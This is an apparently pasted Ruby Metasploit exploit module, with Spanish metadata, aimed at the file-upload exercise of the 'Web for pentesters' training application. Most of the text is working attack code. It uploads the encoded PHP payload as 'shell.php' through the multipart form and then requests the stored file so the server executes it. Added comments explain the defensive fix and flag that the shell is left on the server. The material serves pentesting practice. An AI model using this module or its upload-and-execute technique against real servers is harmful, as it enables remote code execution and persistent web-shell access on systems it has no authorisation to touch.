miguelangelgarcia

Exploit MSF para FileUpload

Jul 26th, 2014
  1. require 'msf/core'
  2.  
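  # Example Metasploit module for a file-upload weakness in the application
  # the module's name calls "Web for pentesters".
  #
  # Flow, as written below: the encoded PHP payload is posted to the upload
  # form as the multipart field "image", and the stored file is then
  # requested so that the server runs it.
  #
  # Defender's view: the module only works when the server accepts an upload
  # with a script extension and serves it from a directory where scripts
  # execute. Validating extension and content server-side, and keeping
  # uploads in a location that is never interpreted, removes the condition
  # this module depends on.
  #
  # NOTE(review): the module does not delete the uploaded file, so it stays
  # in the upload directory after a test until someone removes it.
  class Metasploit3 < Msf::Exploit::Remote
    Rank = ExcellentRanking

    include Msf::Exploit::Remote::HttpClient

    # Registers the module metadata and its two operator options.
    #
    # @param info [Hash] metadata merged into the defaults via update_info
    def initialize(info = {})
      super(update_info(info, {
        'Name'          => 'File Upload en Web for pentesters',
        'Description'   => 'Ejemplo de File Upload',
        'License'       => MSF_LICENSE,
        'Author'        => [ 'nodoraiz', 'Miguel Angel Garcia' ],
        'Platform'      => ['php'],
        'Arch'          => ARCH_PHP,
        'Targets'       => [['Automatic', {}]],
        'DefaultTarget' => 0
      }))

      register_options([
        OptString.new("path", [ true, "Ruta al formulario de subida", "/upload/example1.php" ]),
        OptString.new("file", [ true, "Nombre del fichero a crear", "shell.php" ]),
      ], self.class)
    end

    # Requests the upload form and reports what that single GET can support.
    #
    # A 200 response only shows that the form is reachable; it says nothing
    # about whether the server filters uploads, so the result is Detected
    # rather than Vulnerable. No response at all is reported as Unknown,
    # because an unreachable host has not been shown to be safe.
    #
    # @return [Array] one of the Exploit::CheckCode constants
    def check
      res = send_request_cgi({
        'method' => 'GET',
        'uri'    => normalize_uri(target_uri.path, datastore["path"])
      })

      return Exploit::CheckCode::Unknown unless res
      return Exploit::CheckCode::Safe unless res.code == 200

      Exploit::CheckCode::Detected
    end

    # Posts the encoded payload to the upload form as multipart/form-data.
    #
    # The form fields are "image" (the file part, named after the "file"
    # option) and "send" (the submit button value).
    #
    # @return [Object, nil] the response from send_request_cgi; the callers
    #   in this file treat a falsy value as "no response"
    def upload
      form = Rex::MIME::Message.new
      form.add_part(payload.encoded, "application/x-php", nil, "form-data; name=\"image\"; filename=\"#{datastore["file"]}\"")
      form.add_part('Send file', nil, nil, 'form-data; name="send"')

      send_request_cgi({
        'uri'    => normalize_uri(target_uri.path, datastore["path"]),
        'method' => "POST",
        'ctype'  => "multipart/form-data; boundary=#{form.bound}",
        'data'   => form.to_s
      })
    end

    # Uploads the payload and, on a 200 response, requests the stored file.
    #
    # fail_with expects a failure reason followed by the message; the
    # original call passed the message alone, so the message ended up in the
    # reason slot. The two failure cases are now reported with distinct
    # reasons and the same message.
    def exploit
      res = upload

      fail_with(Failure::Unreachable, "Fallo en la subida del fichero") unless res
      fail_with(Failure::UnexpectedReply, "Fallo en la subida del fichero") unless res.code == 200

      # NOTE(review): the storage directory is hard-coded here and does not
      # follow the "path" option or target_uri.path used by check and upload.
      send_request_raw({'uri' => "/upload/images/#{datastore["file"]}"})
    end
  end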